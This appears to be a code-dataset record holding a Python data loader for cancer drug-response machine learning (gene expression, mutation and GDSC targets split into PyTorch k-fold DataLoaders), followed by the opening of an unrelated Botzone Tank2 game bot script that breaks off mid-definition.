mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_mut_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_labeled_samples].values.astype('float32')), torch.from_numpy(mut_target_df.values.astype('float32')) ) labeled_mut_dataloader = DataLoader(labeled_mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) labeled_drug_mut_only_dataset = TensorDataset( 
torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_mut_dataloader, labeled_drug_mut_only_dataloader def get_drug_labeled_gex_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # # get gex dataset and dataloader # drug_gex_target_df = drug_target_df.loc[drug_gex_labeled_samples] # gex_label_vec = (drug_gex_target_df < np.median(drug_gex_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] sample_label_vec = (gex_target_df.isna().sum(axis=1) <= gex_target_df.isna().sum(axis=1).median()).astype('int') if not ft_flag: pass else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.gex_dat.loc[gex_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[gex_labeled_samples].values[train_index], \ self.gex_dat.loc[gex_labeled_samples].values[test_index] train_labels, test_labels = gex_target_df.values[train_index].astype('float32'), gex_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = 
DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True,drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader def get_drug_labeled_mut_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # drug_mut_labeled_samples = self.ccle_mut_dat.index.intersection(drug_target_df.index) # drug_mut_only_labeled_samples = drug_mut_labeled_samples.difference(drug_gex_labeled_samples) # drug_mut_labeled_samples = drug_mut_labeled_samples.difference(drug_mut_only_labeled_samples) # # drug_mut_target_df = drug_target_df.loc[drug_mut_labeled_samples] # mut_label_vec = (drug_mut_target_df < np.median(drug_mut_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] sample_label_vec = (mut_target_df.isna().sum(axis=1) <= mut_target_df.isna().sum(axis=1).median()).astype('int') labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), 
torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) if not ft_flag: pass # labeled_mut_dataset = TensorDataset( # torch.from_numpy(self.ccle_mut_dat.loc[drug_mut_labeled_samples].values.astype('float32')), # torch.from_numpy(drug_mut_target_df.values.astype('float32')) # ) # labeled_mut_dataloader = DataLoader(labeled_mut_dataset, # batch_size=self.batch_size, # shuffle=True) # return labeled_mut_dataloader, labeled_drug_mut_only_dataloader else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[mut_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[mut_labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[mut_labeled_samples].values[test_index] train_labels, test_labels = mut_target_df.values[train_index].astype('float32'), mut_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_unlabeld_mut_dataloader(self, match=True): if match: mut_gex_samples = self.gex_dat.index.intersection(self.mut_dat.index) mut_gex_dataset = TensorDataset( torch.from_numpy(self.mut_dat.loc[mut_gex_samples].values.astype('float32')), torch.from_numpy(self.gex_dat.loc[mut_gex_samples].values.astype('float32')) ) unlabeled_mut_gex_dataloader = 
DataLoader(mut_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True ) return unlabeled_mut_gex_dataloader else: mut_dataset = TensorDataset(torch.from_numpy(self.mut_dat.values.astype('float32'))) unlabeled_mut_dataloader = DataLoader(mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return unlabeled_mut_dataloader def get_labeled_samples(self): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] return labeled_samples, mut_only_labeled_samples
<filename>data.py import os import datetime import numpy as np import random import pandas as pd import data_config import torch from torch.utils.data import TensorDataset, DataLoader from sklearn.model_selection import train_test_split, StratifiedKFold _RNG_SEED = None DRUG_DICT = { 'gem': 'gemcitabine', 'ava': 'avagacestat', } def get_rng(obj=None): """ This function is copied from `tensorpack <https://github.com/ppwwyyxx/tensorpack/blob/master/tensorpack/utils/utils.py>`__. Get a good RNG seeded with time, pid and the object. Args: obj: some object to use to generate random seed. Returns: np.random.RandomState: the RNG. """ seed = (id(obj) + os.getpid() + int(datetime.now().strftime("%Y%m%d%H%M%S%f"))) % 4294967295 if _RNG_SEED is not None: seed = _RNG_SEED return random.Random(seed) class DataProvider: def __init__(self, batch_size=64, target='AUC', random_seed=2019): self.seed = random_seed self.target = target self.batch_size = batch_size self._load_gex_data() self._load_mut_data() self._load_target_data() self.shape_dict = {'gex': self.gex_dat.shape[-1], 'mut': self.mut_dat.shape[-1], 'target': self.target_df.shape[-1]} def _load_gex_data(self): self.gex_dat = pd.read_csv(data_config.gex_feature_file, index_col=0) # ccle_sample_info_df = pd.read_csv(data_config.ccle_sample_file, index_col=0) # with gzip.open(data_config.xena_sample_file) as f: # xena_sample_info_df = pd.read_csv(f, sep='\t', index_col=0) # xena_samples = xena_sample_info_df.index.intersection(self.gex_dat.index) # ccle_samples = self.gex_dat.index.difference(xena_samples) # xena_sample_info_df = xena_sample_info_df.loc[xena_samples] # ccle_sample_info_df = ccle_sample_info_df.loc[ccle_samples.intersection(ccle_sample_info_df.index)] # self.xena_gex_df = self.gex_dat.loc[xena_samples] # self.mut_gex_df = self.gex_dat.loc[ccle_samples] def _load_mut_data(self): self.xena_mut_dat = pd.read_csv(data_config.xena_mut_uq_file, index_col=0) self.ccle_mut_dat = 
pd.read_csv(data_config.ccle_mut_uq_file, index_col=0) self.mut_dat = self.xena_mut_dat.append(self.ccle_mut_dat) def _load_target_data(self): # gdsc1_response = pd.read_csv(data_config.gdsc_target_file1) # gdsc2_response = pd.read_csv(data_config.gdsc_target_file2) # gdsc1_sensitivity_df = gdsc1_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc2_sensitivity_df = gdsc2_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc1_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc1_sensitivity_df['DRUG_NAME'].str.lower() # gdsc2_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc2_sensitivity_df['DRUG_NAME'].str.lower() # # if self.target == 'LN_IC50': # gdsc1_sensitivity_df.loc[:, self.target] = np.exp(gdsc1_sensitivity_df[self.target]) # gdsc2_sensitivity_df.loc[:, self.target] = np.exp(gdsc2_sensitivity_df[self.target]) # # gdsc1_target_df = gdsc1_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc2_target_df = gdsc2_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc1_target_df = gdsc1_target_df.loc[gdsc1_target_df.index.difference(gdsc2_target_df.index)] # gdsc_target_df = pd.concat([gdsc1_target_df, gdsc2_target_df]) target = self.target.lower() gdsc_target_df = pd.read_csv(data_config.gdsc_target_file) gdsc_target_df = gdsc_target_df[['COSMIC_ID', 'DRUG_NAME', target]] gdsc_target_df.dropna(subset=[target], inplace=True) gdsc_target_df = gdsc_target_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() target_df = gdsc_target_df.reset_index().pivot_table(values=target, index='COSMIC_ID', columns='DRUG_NAME') ccle_sample_info = pd.read_csv(data_config.ccle_sample_file, index_col=4) ccle_sample_info = ccle_sample_info.loc[ccle_sample_info.index.dropna()] ccle_sample_info.index = ccle_sample_info.index.astype('int') gdsc_sample_info = pd.read_csv(data_config.gdsc_sample_file, header=0, index_col=1) gdsc_sample_info = gdsc_sample_info.loc[gdsc_sample_info.index.dropna()] gdsc_sample_info.index = gdsc_sample_info.index.astype('int') gdsc_sample_mapping = 
gdsc_sample_info.merge(ccle_sample_info, left_index=True, right_index=True, how='inner')[ ['DepMap_ID']] gdsc_sample_mapping_dict = gdsc_sample_mapping.to_dict()['DepMap_ID'] target_df.index = target_df.index.map(gdsc_sample_mapping_dict) target_df = target_df.loc[target_df.index.dropna()] gex_labeled_samples = self.gex_dat.index.intersection(target_df.index) target_df.drop(columns=target_df.columns[ target_df.loc[gex_labeled_samples].isna().sum() / len(gex_labeled_samples) >= 0.1], inplace=True) self.target_df = target_df def get_unlabeled_gex_dataloader(self): gex_dataset = TensorDataset(torch.from_numpy(self.gex_dat.values.astype('float32'))) unlabeled_gex_dataloader = DataLoader(gex_dataset, batch_size=self.batch_size, shuffle=True) return unlabeled_gex_dataloader def get_labeled_data_generator(self, omics='mut'): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] labeled_target_df = self.target_df.loc[labeled_samples] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_labeled_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) sample_label_vec = ( 
labeled_target_df.isna().sum(axis=1) <= labeled_target_df.isna().sum(axis=1).median()).astype('int') s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) if omics == 'gex': for train_index, test_index in s_kfold.split(self.gex_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[labeled_samples].values[train_index], \ self.gex_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader else: for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) 
yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_labeled_gex_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] labeled_gex_dataset = TensorDataset( torch.from_numpy(self.gex_dat.loc[gex_labeled_samples].values.astype('float32')), torch.from_numpy(gex_target_df.values.astype('float32')) ) labeled_gex_dataloader = DataLoader(labeled_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_gex_dataloader def get_labeled_mut_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_mut_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_labeled_samples].values.astype('float32')), torch.from_numpy(mut_target_df.values.astype('float32')) ) labeled_mut_dataloader = DataLoader(labeled_mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) labeled_drug_mut_only_dataset = TensorDataset( 
torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_mut_dataloader, labeled_drug_mut_only_dataloader def get_drug_labeled_gex_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # # get gex dataset and dataloader # drug_gex_target_df = drug_target_df.loc[drug_gex_labeled_samples] # gex_label_vec = (drug_gex_target_df < np.median(drug_gex_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] sample_label_vec = (gex_target_df.isna().sum(axis=1) <= gex_target_df.isna().sum(axis=1).median()).astype('int') if not ft_flag: pass else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.gex_dat.loc[gex_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[gex_labeled_samples].values[train_index], \ self.gex_dat.loc[gex_labeled_samples].values[test_index] train_labels, test_labels = gex_target_df.values[train_index].astype('float32'), gex_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = 
DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True,drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader def get_drug_labeled_mut_dataloader(self, drug=None, ft_flag=True): # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # drug_mut_labeled_samples = self.ccle_mut_dat.index.intersection(drug_target_df.index) # drug_mut_only_labeled_samples = drug_mut_labeled_samples.difference(drug_gex_labeled_samples) # drug_mut_labeled_samples = drug_mut_labeled_samples.difference(drug_mut_only_labeled_samples) # # drug_mut_target_df = drug_target_df.loc[drug_mut_labeled_samples] # mut_label_vec = (drug_mut_target_df < np.median(drug_mut_target_df)).astype('int') gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] sample_label_vec = (mut_target_df.isna().sum(axis=1) <= mut_target_df.isna().sum(axis=1).median()).astype('int') labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), 
torch.from_numpy(mut_only_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) if not ft_flag: pass # labeled_mut_dataset = TensorDataset( # torch.from_numpy(self.ccle_mut_dat.loc[drug_mut_labeled_samples].values.astype('float32')), # torch.from_numpy(drug_mut_target_df.values.astype('float32')) # ) # labeled_mut_dataloader = DataLoader(labeled_mut_dataset, # batch_size=self.batch_size, # shuffle=True) # return labeled_mut_dataloader, labeled_drug_mut_only_dataloader else: s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[mut_labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[mut_labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[mut_labeled_samples].values[test_index] train_labels, test_labels = mut_target_df.values[train_index].astype('float32'), mut_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_unlabeld_mut_dataloader(self, match=True): if match: mut_gex_samples = self.gex_dat.index.intersection(self.mut_dat.index) mut_gex_dataset = TensorDataset( torch.from_numpy(self.mut_dat.loc[mut_gex_samples].values.astype('float32')), torch.from_numpy(self.gex_dat.loc[mut_gex_samples].values.astype('float32')) ) unlabeled_mut_gex_dataloader = 
DataLoader(mut_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True ) return unlabeled_mut_gex_dataloader else: mut_dataset = TensorDataset(torch.from_numpy(self.mut_dat.values.astype('float32'))) unlabeled_mut_dataloader = DataLoader(mut_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return unlabeled_mut_dataloader def get_labeled_samples(self): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] return labeled_samples, mut_only_labeled_samples
en
0.327723
This function is copied from `tensorpack <https://github.com/ppwwyyxx/tensorpack/blob/master/tensorpack/utils/utils.py>`__. Get a good RNG seeded with time, pid and the object. Args: obj: some object to use to generate random seed. Returns: np.random.RandomState: the RNG. # ccle_sample_info_df = pd.read_csv(data_config.ccle_sample_file, index_col=0) # with gzip.open(data_config.xena_sample_file) as f: # xena_sample_info_df = pd.read_csv(f, sep='\t', index_col=0) # xena_samples = xena_sample_info_df.index.intersection(self.gex_dat.index) # ccle_samples = self.gex_dat.index.difference(xena_samples) # xena_sample_info_df = xena_sample_info_df.loc[xena_samples] # ccle_sample_info_df = ccle_sample_info_df.loc[ccle_samples.intersection(ccle_sample_info_df.index)] # self.xena_gex_df = self.gex_dat.loc[xena_samples] # self.mut_gex_df = self.gex_dat.loc[ccle_samples] # gdsc1_response = pd.read_csv(data_config.gdsc_target_file1) # gdsc2_response = pd.read_csv(data_config.gdsc_target_file2) # gdsc1_sensitivity_df = gdsc1_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc2_sensitivity_df = gdsc2_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc1_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc1_sensitivity_df['DRUG_NAME'].str.lower() # gdsc2_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc2_sensitivity_df['DRUG_NAME'].str.lower() # # if self.target == 'LN_IC50': # gdsc1_sensitivity_df.loc[:, self.target] = np.exp(gdsc1_sensitivity_df[self.target]) # gdsc2_sensitivity_df.loc[:, self.target] = np.exp(gdsc2_sensitivity_df[self.target]) # # gdsc1_target_df = gdsc1_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc2_target_df = gdsc2_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc1_target_df = gdsc1_target_df.loc[gdsc1_target_df.index.difference(gdsc2_target_df.index)] # gdsc_target_df = pd.concat([gdsc1_target_df, gdsc2_target_df]) # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # 
drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # # get gex dataset and dataloader # drug_gex_target_df = drug_target_df.loc[drug_gex_labeled_samples] # gex_label_vec = (drug_gex_target_df < np.median(drug_gex_target_df)).astype('int') # drug = DRUG_DICT[drug] # drug_target_df = self.target_df[drug] # drug_target_df.dropna(inplace=True) # drug_gex_labeled_samples = self.gex_dat.index.intersection(drug_target_df.index) # drug_mut_labeled_samples = self.ccle_mut_dat.index.intersection(drug_target_df.index) # drug_mut_only_labeled_samples = drug_mut_labeled_samples.difference(drug_gex_labeled_samples) # drug_mut_labeled_samples = drug_mut_labeled_samples.difference(drug_mut_only_labeled_samples) # # drug_mut_target_df = drug_target_df.loc[drug_mut_labeled_samples] # mut_label_vec = (drug_mut_target_df < np.median(drug_mut_target_df)).astype('int') # labeled_mut_dataset = TensorDataset( # torch.from_numpy(self.ccle_mut_dat.loc[drug_mut_labeled_samples].values.astype('float32')), # torch.from_numpy(drug_mut_target_df.values.astype('float32')) # ) # labeled_mut_dataloader = DataLoader(labeled_mut_dataset, # batch_size=self.batch_size, # shuffle=True) # return labeled_mut_dataloader, labeled_drug_mut_only_dataloader
2.377337
2
build/botzone_tank2.py
zhongxinghong/Botzone-Tank2
11
6628980
# -*- coding: utf-8 -*- # @author: Rabbit # @filename: botzone_tank2.py # @date: 2019-05-29 21:31:38 # @site: https://github.com/zhongxinghong/Botzone-Tank2 # @description: Automatically built Python single-file script for Botzone/Tank2 game """ MIT License Copyright (c) 2019 Rabbit Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" #{ BEGIN 'const.py' }# #----------------------# # Environment Variable # #----------------------# DEBUG_MODE = False LONG_RUNNING_MODE = False SIMULATOR_ENV = False COMPACT_MAP = False SIMULATOR_PRINT = True #-------------# # Game Config # #-------------# MAP_HEIGHT = 9 MAP_WIDTH = 9 SIDE_COUNT = 2 TANKS_PER_SIDE = 2 #-------------# # Game Status # #-------------# GAME_STATUS_NOT_OVER = -2 GAME_STATUS_DRAW = -1 GAME_STATUS_BLUE_WIN = 0 GAME_STATUS_RED_WIN = 1 BLUE_SIDE = 0 RED_SIDE = 1 #{ END 'const.py' }# #{ BEGIN 'global_.py' }# import time import sys import types import json import random import pickle import base64 import gzip import hashlib import numpy as np from collections import deque from pprint import pprint import functools from contextlib import contextmanager from copy import deepcopy #{ END 'global_.py' }# #{ BEGIN 'utils.py' }# _null_func = lambda *args, **kwargs: None if DEBUG_MODE: debug_print = print debug_pprint = pprint else: debug_print = _null_func debug_pprint = _null_func if SIMULATOR_ENV and SIMULATOR_PRINT: simulator_print = print simulator_pprint = pprint else: simulator_print = _null_func simulator_pprint = _null_func @contextmanager def outer_label(): """ 用于直接打断外层循环,或者继续外层循环 如果置于循环体之外,就是 break outer 如果置于循环体之内,就是 continue outer """ class _GotoOuterException(Exception): pass try: yield _GotoOuterException() # 每次创建后都不相同,嵌套的情况下,需要确保名称不相同 except _GotoOuterException: # 这样做是为了防止嵌套的情况下,无法从内层直接跳到最外层 pass class _Missing(object): """ from werkzeug._internal """ def __repr__(self): return 'no value' def __reduce__(self): return '_missing' _MISSING = _Missing() class CachedProperty(property): """ from werkzeug.utils """ def __init__(self, func, name=None, doc=None): self.__name__ = name or func.__name__ self.__module__ = func.__module__ self.__doc__ = doc or func.__doc__ self.func = func def __set__(self, obj, value): obj.__dict__[self.__name__] = value def __get__(self, obj, type=None): if obj is None: return self value = 
